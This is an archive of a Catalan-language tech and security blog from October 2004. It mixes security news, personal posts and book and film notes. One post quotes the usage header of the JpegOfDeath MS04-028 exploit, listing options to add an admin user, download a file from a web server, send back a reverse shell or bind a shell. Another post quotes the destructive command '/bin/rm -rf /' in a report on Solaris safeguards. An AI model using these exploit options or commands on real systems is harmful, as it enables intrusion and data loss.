- Desbordamiento de la pila en Linux x86. Teòria i pràctica de les vulnerabilitats de desbordament de memòria intermèdia.
- Exploit remoto para el sistema Windows 2000. Utilització de la vulnerabilitat RPC per controlar remotament un equip amb Windows 2000.
- La puerta trasera del sistema GNU/Linux. Algunos métodos. Mètodes que poden ser utilitzats per un usuari amb accés a la màquina per obtenir les credencials de root.
- OS fingerprinting. ¿Cómo no dejarnos reconocer? Com funciona el reconeixement remot del sistema operatiu i mètodes per evitar-los o donar una informació errònia.
|
18:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[ITConversations] The Future of Security. La taula rodona celebrada dins del darrer Gnomedex 4.0 sobre la seguretat informàtica:
A panel of experts explores the future of computer security. Are hardware methods superior to software? How do memory-managed languages help? How can we make security management within the skill set of the average user? Is automation the answer? Should upgrades be mandated? Should there be a security tax for those who don't upgrade their systems. DRM: Does it increase security risks? And what attacks should we expect in the future? The panelists are:
Chris DiBona, www.dibona.com
Neil "Grifter" Wyler, www.rootcompromise.org
Fred Felman, www.zonelabs.com
CJ Holthaus, www.centtech.com
Dan Appleman, www.danappleman.com
Greg Hughes, www.greghughes.net
Robert Scoble, scoble.weblogs.com
|
14:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[ComputerWorld] Nine questions to ask when evaluating a security threat. Com saber si un problema de seguretat que actualment s'està explotant ens afecta a nosaltres i quina és la seva importància
- La vulnerabilitat afecta a software que fem servir?
- L'amenaça prové de l'interior o l'exterior de la nostra xarxa?
- És difícil aprofitar-se de la vulnerabilitat?
- Quin és l'impacte d'un atac reeixit?
- De quan és la meva darrera còpia de seguretat?
- Hem preparat una resposta a un atac d'aquesta mena?
- Quin és l'estat actual de la meva xarxa?
- És un atac directe contra nosaltres?
- La solució per evitar els problemes és pitjor que la malaltia?
|
12:07 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Hi ha qui enganxa l'adhesiu del «burro català» al cotxe... jo l'he ficat a l'ordinador portàtil.
|
11:07 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 9 / octubre / 2004 |
 Fa un parell de setmanes vaig comprar el pack amb l'edició en DVD de les tres pel·lícules clàssiques de «La Guerra de les Galàxies»: «Una nova esperança» (títol de la primera pel·lícula, la de l'any 1977 on sortia el primer Estel de la Mort), «L'imperi contraataca» i «El retorn del Jedi».
L'únic retret que puc fer a aquesta edició és la manca del català com opció d'idioma per escoltar la pel·lícula, però la resta és el conjunt ben conegut. Potser el més curiós es que la denominació clàssica de «La Guerra de les Galàxies» no surt per enlloc; en tots els casos s'utiliza la denominació anglesa.
De les diferències que vaig indicar fa uns dies, la única que he notat és el nou aspecte del cuc Jabba. La resta passen totalment inadvertides.
Encara no he mirat el quart DVD, el d'històries addicionals, però és que gairebé mai miro aquests DVD.
|
18:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Curiosa pàgina d'IBM: Globalizing your e-business posant el català com un aspecte a considerar en les estratègies de màrketing:
Catalan is a romance language that is spoken in the Western Mediterranian in parts of Spain, France, Andorra, and Italy.
While Catalan does not have official status in the European Union (EU), it is the language with the largest number of speakers of any of the minority or regional languages in the EU.Approximately 7 to 8 million speakers consider it their mother tongue. As such it is probably more widely spoken than eight of the twenty official languages of the EU, specifically, Danish, Estonian, Finnish, Latvian, Lithuanian, Maltese, Slovak, and Slovenian. Actually, the population of Catalan speakers is in the same approximate range as Greek, Portuguese, and Swedish.
Spain is home to the majority of Catalan speakers. Catalan is a coofficial language with Spanish in three parts of Spain, specifically, Catalonia (also known as Catalunya), the Balearic Islands, and Valencia. It is also spoken, but is not official in Aragon. According to the 1996 census, almost 80% of the people in the province of Catalonia speak Catalan and 95% understand it. The numbers in the Balearic Islands are similar while in Valencia, about 50% of the population speaks Catalan.
Catalan is the only official language of Andorra and is coofficial with Italian and Sardinian in the Sardinian city of Alghero. It is also spoken in the Roussillon province in Southern France. These three regions combined represent less than 200 thousand speakers.
There are a number of dialects of Catalan. Some examples are Central, Balear, Valencian, and Algherese. As with all dialects, this means that there are some small differences in terminology, spelling, and pronunciation. Newspapers and television use a common form of Catalan that attempts to select vocabulary that can be understood by all speakers.
The language of Catalan should be evaluated as part of any marketing strategy for the Eastern part of Spain and Andorra.
Actualització - Traducció al català
El català és un idioma d'arrels llatines que es parla a la Mediterrània occidental, en parts d'Espanya, França, Andorra i Itàlia.
Malgrat que el català no té un status oficial a la Unió Europea, és l'idioma amb més parlants de tots els idiomes minoritaris i regionals d'Europa. Aproximadament uns 7 o 8 milions el consideren com la seva llengua materna. Això fa que tingui més parlants que vuit dels vint idiomes oficials de la Unió Europea: el danès, l'estonià, el finès, el latvi, el lituà, el maltès, l'eslovè i l'eslovac. De fet, el nombre de parlants del català es equivalent al nombre de parlants del grec, el portuguès o el suec.
Espanya és l'estat on viuen la major part dels parlants del català. El català és cooficial, juntament amb l'espanyol, a tres zones de l'estat: Catalunya, les Illes Balears i València. També es parla, malgrat que no és oficial, a l'Aragó. D'acord amb el cens de l'any 1996, aproximadament el 80% dels habitants de Catalunya el parlen i un 95% l'entenen. A les Illes Balears la proporció es semblant mentre que a València aproximadament la meitat de la població parla el català.
El català és l'únic idioma oficial a Andorra i és cooficial, juntament amb l'italià i el sard, a l'Alguer. També es parla al Rosselló, al sud-est de França. Aquestes tres regions combinades representen menys de 200.000 parlants.
Hi ha diverses formes dialectals del català, com la central, l'illenc, el valencià i l'alguerès. Com en totes les formes dialectals, hi ha diferències menors en la terminologia, escriptura i pronunciació. Els diaris i la televisió fan servir una forma comú del català que intenta utilitzar un vocabulari que pot ser comprés per tots els parlants.
El català cal tenir-lo en compte alhora de planificar una estratègia de màrqueting a l'est d'Espanya i a Andorra.
Tant debò IBM apliqués aquests consells...
|
16:31 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[InfoWorld] Security supply and demand. Jon Udell entrevista a Russ Cooper, de Cybertrust sobre la responsabilitat de IW: Microsoft en la seguretat:
IW: Are you saying that SP2 [Service Pack 2] reflects a changed consumer attitude?
RC: No, unfortunately not. It represents a consensus amongst consumers and security professionals about how much restriction we can put on standard functionality without ticking off the people who don’t care about security. It’s neither as convenient as consumers would like nor as secure as security pros would recommend.
IW: Is Microsoft really changing?
RC: We are seeing a real cultural change, but there’s no history to back it up. The SP2 deliverable represents a dramatic shift. … We see [Microsoft] doing things they would never have done before, such as increasing support cost to provide security and recognizing that security will affect product sales. Will this shift be permanent, or will they flip back to feature-driven mode? We don’t know.
(...)
IW: Any final advice?
RC: Get SP2 installed. There’s no rush, but do it. Realize, though, that apart from user education -- which is valuable -- we’re not going to see the direct benefits of any of this for years. Also realize that consumers are the ones affecting us the most. Whatever we can do to improve their environment will make our lives simpler because we’ll have fewer things attacking us.
|
16:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Expert: Online extortion growing more common. Segons el director de SANS Institute, cada vegada és més habitual l'ús de l'extorsió a Internet:
Six or seven thousand organizations are paying online extortion demands," Alan Paller said at the SANS Institute's Top 20 Vulnerabilities conference in London. "The epidemic of cybercrime is growing. You don't hear much about it because it's extortion, and people feel embarrassed to talk about it."
"There's an enormous amount of extortion. We are concerned...(that) the technologies of extracting money could be used to endanger the (critical national infrastructure). One of the things we are talking about is how to mitigate that threat."
|
16:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft ha retirat la versió beta del MSN Messenger 7.0 ja que s'ha descobert un problema de seguretat en una de les noves funcions, que podria arribar a comprometre els ordinadors on està instal·lat el programa:
Testers discovered a potential security issue in the early version of MSN Messenger 7 shortly after Microsoft made the instant messaging client available to a select group of testers over the weekend, according to postings on MSN Messenger enthusiast Web site Mess.be.
The problem lies in a new MSN Messenger feature dubbed "winks" that allows users to send each other sound animations. The feature can be abused to overwhelm a user's system.
|
15:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Portava molt temps sense entrar a la missatgeria instantània del Jabber i, com acostuma a passar, m'he oblidat de la meva contrasenya i no he pogut recuperar-la (ja que tampoc recordo des de quin compte de correu em vaig donar d'alta).
Així doncs que he hagut de crear un nou compte: os2man@jabber.org. A l'anterior tampoc no es que tingués masses contactes, però... en fi, que hi farem :-(
|
12:49 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[HowToDoThings.com] Password Authentication. Malgrat tots els seus problemes, les contrasenyes continuen sent el sistema més utilitzat per a la autenticació de la identitat, tant d'usuaris com de sistemes. En aquest document es mostren algunes consideracions per tal de millorar la qualitat d'aquest mètode, aplicant principis de xifrat.
|
12:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 8 / octubre / 2004 |
[O'Reilly] Test Driving OpenOffice.org, the Next Generation. Les primeres impressions sobre l'OpenOffice.org 2.0, a partir de la versió pre-alpha disponible en l'actualitat.
|
06:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Mitsuishi ha desenvolupat el «HagakiPC», un ordinador PC de la mida d'una postal (13,5x10,7x1,8 cm i 340 grams de pes) capaç d'executar Windows XP.
Incorpora 128 MB de memòria més una memòria flash de 128 MB addicionals, un slot per CompactFlash, un port USB, una pantalla de 4 polzades que dóna una resolució 640x480 i un processador a 266 MHz. Funciona amb dues piles AA, que li donen una autonomia de 4 hores.
Per a més detalls sobre aquest equip, podeu veure l'anàlisi que es fa a Handtops.com.
|
06:50 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
El 7 d'octubre de 1994 Dave Winer enviava un missatge a la indústria del software... el seguiment d'aquest missatge va ser l'origen del primer weblog.
Ten years ago today I sent an email to the software industry, about a Marc Canter product rollout. That was followed by a series of emails, many hundred of them, most written by me, but some written by others. In 1997, the email flow spawned what I called a news site which eventually became known as a weblog, and then shortened to blog.
|
06:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] Defeating Honeypots: Network Issues, Part II. Segona part de la sèrie d'articles sobre les tàctiques utilitzades per tal d'identificar l'existència de honeypots. En aquesta segona part es presenta la part pràctica de la detecció de honeypots basats en Sebek, snort_inline, Fake AP i Bait.
|
06:16 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
FreeSBIE (Free System Burned in Economy), distribució tipus «LiveCD» basada en el sistema operatiu FreeBSD.
|
06:13 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 7 / octubre / 2004 |
[The Inquirer] Anti-virus program detects GNU Public Licence. L'antivirus Clam Antivirus ha estat actualitzat per tal d'eliminar un fals positiu: considerava el text de la llicència GNU com un virus...
 És només una curiositat, però no deixa de ser... irònic. De fet, la llicència GPL es podria arribar a considerar un virus, o millor dit... la GPL utilitza un model 'víric' ja que no es pot redistribuir codi GPL dins de codi propietari sense 'infectar-se' amb la GPL.
|
06:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[MicroScope] A history of global hacking. Cronologia dels esdeveniments que han marcat la història del hacking. Tot va començar, segons aquesta cronologia, l'any 1971 quan John Draper se les va manegar per realitzar trucades telefòniques gratuïtes (un any més tard es fundava Apple amb l'objectiu de comercialitzar aquests dispositius -il·legals- per a fer trucades gratuïtes).
|
06:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
What you should know about a reported vulnerability in Microsoft ASP.NET
Microsoft is currently investigating a reported vulnerability in Microsoft ASP.NET. An attacker can send specially crafted requests to the server and view secured content without providing the proper credentials. This reported vulnerability exists in ASP.NET and does not affect ASP.
This issue affects Web content owners who are running any version of ASP.NET on Microsoft Windows 2000, Windows 2000 Server, Windows XP Professional, and Windows Server 2003.
|
06:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 6 / octubre / 2004 |
Ahir es va presentar el «Manifest sobre l'ús del programari lliure a l'educació», promogut per l'Associació d'Ensenyants d'Informàtica de Catalunya.
Fins aquí tot normal... «La Vanguardia», diari més que centenari se'n fa ressò d'aquesta forma: (el ressaltat és meu):
Los profesores de informática reclaman trabajar con un temario abierto
LA VANGUARDIA - 05/10/2004
BARCELONA. (Redacción.) - La Associació d'Ensenyants d'Informàtica de Catalunya (AEIC), que aglutina a profesores de informática de centros públicos y concertados, hizo público ayer un manifiesto en favor del uso de un temario abierto para su asignatura. La iniciativa de la AEIC se produce tras dos entrevistas con responsables de la Conselleria d'Educació que, a juicio de portavoces de esta asociación, no han dado ningún fruto. Es más, la AEIC manifiesta su "total desacuerdo" con la política de la dirección general de Ordenació i Innovació Educativa.
El manifiesto argumenta un sinfín de razones a favor de la implantación de este programario y pretende mejorar la implantación de las tecnologías de la información y la comunicación (TIC) en la enseñanza. La nota establece que el uso del programario libre permite "unificar de forma legal el uso de las herramientas informáticas y acerca la posibilidad de entrar en el mundo de las TIC a los sectores más desfavorecidos y a los centros escolares más necesitados", reduciendo así la brecha tecnológica que se produce "en nuestra sociedad".
La AEIC pide a profesores, padres, alumnos, asociaciones, sindicatos y ONG relacionadas con la educación, así como a los componentes del actual Govern, que firmen este manifiesto.
Sembla un acudit, oi?
|
12:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[John Beck] «rm -rf /» protection. Solaris 10 inclourà protecció per tal d'impedir que rm esborri tot el disc dur./bin/rm -rf /
rm of / is not allowed
|
08:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Damn Small Linux és una distribució mínima de Linux que funciona directament des del CD-ROM. La imatge ISO només ocupa 50 MB, de forma que es pot instal·lar en qualsevol CD, inclosos els de mida de targeta de crèdit... o fins i tot dins d'una memòria USB.
Malgrat la seva mida, inclou tot el necessari per accedir a la web, editar documents de text, escoltar música, accés a l'IRC i el correu electrònic, actuar com a terminal.
Per a més detalls, podeu llegir aquest article: Damn Small Linux 0.8.2: a quick view.
|
07:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[CIO] La revista especialitzada en seguretat CIO publica els resultats d'una enquesta a nivell mundial sobre l'estat de la seguretat: 2004 Global Information Security Survey. Aquesta enquesta s'ha realitzat preguntant a 8000 responsables de seguretat d'empreses d'arreu del món.
|
06:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft ha publicat una eina d'anàlisi de la configuració de l'Exchange per tal d'identificar i ajudar a resoldre els problemes de configuració. Microsoft Exchange Server Best Practices Analyzer Tool investiga diversos paràmetres, com la configuració del directori actiu, paràmetres de rendiment, la metabase de l'IIS, la configuració del DNS i d'altres paràmetres.
|
06:38 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[ComputerWorld] Microsoft sets sights on disk-to-disk backup, sobre l'anunci del nou producte de Microsoft: Data Protection Server (DPS).
DPS es bàsicament un entorn distribuït per a la realitzacoó de còpies de segureta que, a partir d'una sèrie d'agents als servidors de fitxers que es volen protegir, realitza còpies de seguretat del seu contingut.
|
06:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Fa setanta anys, el 6 d'octubre de 1934 a les vuit del vespre, el President Lluís Companys proclamava l'Estat Català, com a estat integrat dins d'una República Federal Espanyola, tallant els lligams que unien Catalunya amb el govern de dretes que governava aleshores a la República Espanyola.
Dissortadament la intervenció de l'exèrcit espanyol va impedir la consumació d'aquesta proclamació. En poc menys de deu hores, l'exèrcit havia bombardejat el Palau de la Generalitat i el President Companys en veure perduda la situació es va lliurar per tal d'evitar un riu de sang. L'Estatut va ser suspès i el govern en ple de la Generalitat fou empresonat.
|
00:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 5 / octubre / 2004 |
TinyApps és un weblog especialment interessant per tots aquells que estiguin (estem) interessants en conèixer trucs, descobrir petites meravelles en forma d'eines...
Per exemple, en aquests últims dies parla d'un generador de text aleatori, les eines imprescindibles per Windows que cal portar dins d'un CD, com baixar-se els fitxers ASF...
|
18:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Wired] Genome Model Applied to Software. Moltes tècniques utilitzades pels biòlegs durant el procés d'indentificació de genoma (seqüènciació de l'ADN), poden ser igualment aplicades en les feines d'enginyeria inversa.
|
06:18 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Fairfax] Windows malware count 4500 in first six months
Nearly 4500 worms and viruses which affect the Windows operating system have been documented between January and June this year by security services and anti-virus vendor Symantec in its six-monthly Internet Security Threat Report.
This was nearly 450 percent higher than for the corresponding period in 2003.
(...)
The report said Symantec had documented 1237 new vulnerabilities during the six month period, which meant 48 each week. Nearly three-quarters were considered easy to exploit, and 96 per cent were considered moderately or highly severe.
|
06:14 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 4 / octubre / 2004 |
 Iacobus és el quart llibre de Matilde Asensi que llegeixo (després de «L'origen perdut», «L'últim cató» i «Peregrinatio»).
«Iacobus» és la història, escrita en primera persona, del monjo Galceran de Born. En començar el llibre rep l'ordre d'investigar les misterioses morts en menys d'un any del papa Climent V, el rei Felip IV de França i el cardenal Saint-Valéry. Tots ells van morir després d'assistir a la crema a la foguera del màxim responsable dels cavallers Templers i van rebre la seva maledicció: «en menys d'un any us convoco a comparèixer davant el tribunal de Deu per tal de rebre el vostre merescut càstig».
Per tal d'investigar aquestes morts, en Galceran acompanyat d'un novici (que, per cert, és el seu fill) recorren diversos zones de Provença i França, recollint pistes. Tot sembla indicar que els tres han estat assassinats per un parell de cavallers Templers.
En presentar les seves conclusions davant el papa Joan XXII, en lloc de restar alliberat, rep un altre encàrrec: trobar l'or que l'ordre dels Templers han amagat als voltants del camí de Sant Jaume.
«Iacobus» té una certa semblança amb l'argument de «L'origen perdut» i «L'últim cató». De fet aquesta és una crítica força freqüent de les novel·les de la Matilde Asensi, que repeteixen un mateix fil argumental. Però el que té molt aconseguit l'autora es crear l'atmosfera per tal d'enganxar al lector, que no pot deixar de passar les pàgines tot llegint aventures protagonitzades per personatges cultes i amb moltíssims coneixements.
Si heu llegit algun altra llibre de la Matilde Asensi i us ha agradat podeu agafar aquest llibre amb plena confiança: també uns enganxarà.
Títol: Iacobus
Autora: Matilde Asensi
Ediciones De Bolsillo
1a edició (gener 2003)
377 pàgines
ISBN 84-9759-293-X
|
23:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Netcraft] Security Holes in WordPress. WordPress és un dels entorns més populars per mantenir weblogs. S'ha descobert l'existència d'una vulnerabilitat que pot ser utilitzada per un atacant per crear pàgines dins dels servidors vulnerables.
|
07:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[LURHQ] JPEG «Virus» Facts. Malgrat tot el que s'ha dit sobre l'existència de virus que fan ús de la vulnerabilitat MS04-028, quin és el seu efecte real?
|
06:58 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] Gates on Spyware and OS Competition. Un article de News.com (Gates: Microsoft to offer anti-spyware)explica que Microsoft oferirà productes per lluitar contra els programes espies:
Gates said Microsoft will offer software to detect malicious applications and that the company will keep it up-to-date on an ongoing basis. He did not say when the software would be available or whether Microsoft would charge for it.
També, en aquest mateix post d'Slashdot, comenten un parell d'articles addicionals (Gates: In Ten Years, it's a Windows and Linux Game i Gates undaunted by Linux) sobre una conferència de Bill Gates al Museu d'Història la Informàtica de Califòrnia, on afirma que d'aquí a deu anys els dos únics sistemes operatius que quedaran seran Windows i Linux.
|
03:05 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 3 / octubre / 2004 |
[Vicent Partal] A l'hospital
De retorn de Menorca he hagut de passar una setmana ben bona hospitalitzat.
Li desitjo una ben ràpida i completa recuperació.
|
21:03 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Scripting News] A EVHEAD s'explica com es fa una actualització d'un Mac antic a un de nou... el que demostra com Apple és d'aquelles empreses sap fixar-se amb els detalls i demostra que els seus enginyers són autèntics usuaris del seu producte:
When you boot up a new Mac, it asks you if you're moving from an old Mac. If so, you plug a Firewire cable in, which you borrow from your co-worker, and it just copies everything over. Your files, apps, and accounts. Two hours later, you log into your new Mac, and everything's the same. And it works! Bravo.
|
20:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 [Slashdot] Les investigacions científiques ho confirmen: el cafè realment produeix dependència. Jo en els últims anys he baixat molt el meu consum de cafè; ara em prenc només un parell de tallats al dia (amb dies excepcionals que en prenc fins a quatre)... havia arribat a prendre fins a deu cafès al dia.
Don't be surprised if missing that cup of morning coffee gives you a headache or makes it difficult to concentrate at work. It's all part of caffeine withdrawal.
|
20:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Computer virus inclou algunes dades històriques sobre el món dels virus informàtics atribuint l'origen de la distribució de virus de forma massiva a John Brunner, un dels mítics autors de ciència ficció i autor del llibre «The Shockwave Rider» (any 1975).
Les idees dels primers virus segurament van ser fixades pel joc Darwin (1961), programat pel pare de Robert Morris, Doug McIlroy i Victor Vyssotsky dels laboratoris Bell, amb la finalitat de demostrar algunes capacitats del sistema operatiu Unix.
El primer cuc informàtic amb efectes generals és sens dubte el cuc de Morris, programat per Robert Morris (fill del co-autor del joc Darwin) i que va paralitzar Internet al novembre de 1988.
|
16:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
JpegOfDeath.c, exploit utilitzatble de forma remota per a la vulnerabilitat MS04-028: /*
* Exploit Name:
* =============
* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse
* /Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* (...)
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group;
* IE: Exploit.exe -a pic.jpg
* -d: Download a File From an HTTP Server;
* IE: Exploit.exe -d http://YourWebServer/
* Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a
* Specific Port;
* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg
* (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a
* Specific Port;
* IE: Exploit.exe -b -p 132 pic.jpg (Default Port
* is 1337)
*/
Ara la pregunta es saber quan això començarà a ser utilitzat de forma massiva per virus i cucs.
|
15:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
PADS (Passive Asset Detection System) és un motor basat en la detecció de signatures amb la finalitat de detectar els actius de la xarxa. Està pensat com un complement als sistemes de detecció d'intrusions, doncs ofereix un context a les alertes generades per l'IDS.
|
15:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 2 / octubre / 2004 |
[Via vaca.mu] Findblog, un weblog diferent en castellà: Es planteja una pregunta. La gent cerca la resposta. El primer en respondre-la correctament, en pot proposar una de nova
|
21:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
The LionShare P2P project is an innovative effort to facilitate legitimate file-sharing among individuals and educational institutions around the world. By using Peer to Peer (P2P) technology and incorporating features such as authentication, directory servers, and owner controlled sharing of files, LionShare promises secure file-sharing capabilities for the easy exchange of image collections, video archives, large data collections, and other types of academic information.
|
21:01 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Important actualització de seguretat del Firefox. Es recomana a tots els usuaris l'actualització. La vulnerabilitat pot ser utilitzada per esborrar els fitxers del directori on es descarreguen els programes.
Per solucionar el problema s'ha publicat la versió 0.10.1.
Per cert,
The Mozilla Foundation continues to have a very strong track record on security. According to Secunia, an independent security monitoring organization, Firefox currently has 1 open security issue, out of a total of 13 security advisories filed in 2003 and 2004. 0% of these are labeled "extremely critical", 15% are labeled "highly critical". For the same period, Secunia lists 16 open security issues out of 44 advisories for Internet Explorer 6.0, 14% of which are labeled "extremely critical", 34% are "highly critical".
|
20:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
El nou codi penal, que va entrar en vigor l'1 d'octubre, està generant interpretacions alarmistes a Internet. S'ha dit que prohibeix la còpia privada o que intercanviar cançons en xarxes P2P serà ara causa de presó, tot això inexactituds provocades per la imprecisió del text, segons advocats consultats per Ciberpaís. Entre les novetats, destaca l'augment de penes de presó, el càstig no només del delicte sinó també de la creació, posada en circulació i tinença d'eines per a portar-lo a terme i una especial atenció a la propietat intel·lectual, ampliant la protecció que gaudeixen els programes d'ordinador a llibres, música i vídeos. A més, en aquests casos, la policia actuarà sense denúncia prèvia.
Continuació...
|
08:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 1 / octubre / 2004 |
[Pjorge] Entre ayer y hoy comenta els canvis visuals de la versió en DVD de les tres primeres pel·lícules de la saga «La guerra de las galaxias» que tot just ara s'acaba de publicar. Per exemple, Jabba ha canviat una mica d'aspecte.
|
17:25 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Browsehappy.com, les experiències de persones que han abandonat l'Internet Explorer per passar-se a Firefox. Són històries a l'estil de la campanya «Switch» (encara que de moment no he trobat l'equivalent a l'Ellen Feiss).
|
08:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Qool, un nou telèfon mòbil intel·ligent amb Palm OS, amb càmera integrada de 1,3 Mpíxels.
|
08:50 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Red Hat acquires AOL's Netscape server software. Red Hat ha adquirit el Netscape Enterprise Suite i té previst oferir-lo com coid obert. Això inclou el servidor LDAP (Directory Server), l'autoritat de certificació (Certificate Management) i el servidor web (Enterprise Server).
|
08:31 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] Wireless Attacks and Penetration Testing. Tercera i última part d'una sèrie d'articles sobre la realització de proves de penetració a les xarxes sense fils. En aquesta tercera part es mostren els mètodes per evitar els riscos demostrat a les dues anteriors parts. A la segona part s'explicava com obtenir la clau utilitzada pel xifrat WEP, la realització d'escaneig de ports i la identificació d'elements vulnerables. A la primera part es van explicar els diversos tipus d'atac.
|
07:57 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] Detecting Worms and Abnormal Activities with NetFlow (part 1 i part 2). Netflow és un analitzador de tràfic integrat als encaminadors Cisco, amb capacitat de detecció d'intrusions.
|
07:49 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Mai no havia vist un avís d'aquesta mena a cap altra hotel...
|
07:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
[La Malla] 
[Microsiervos] 
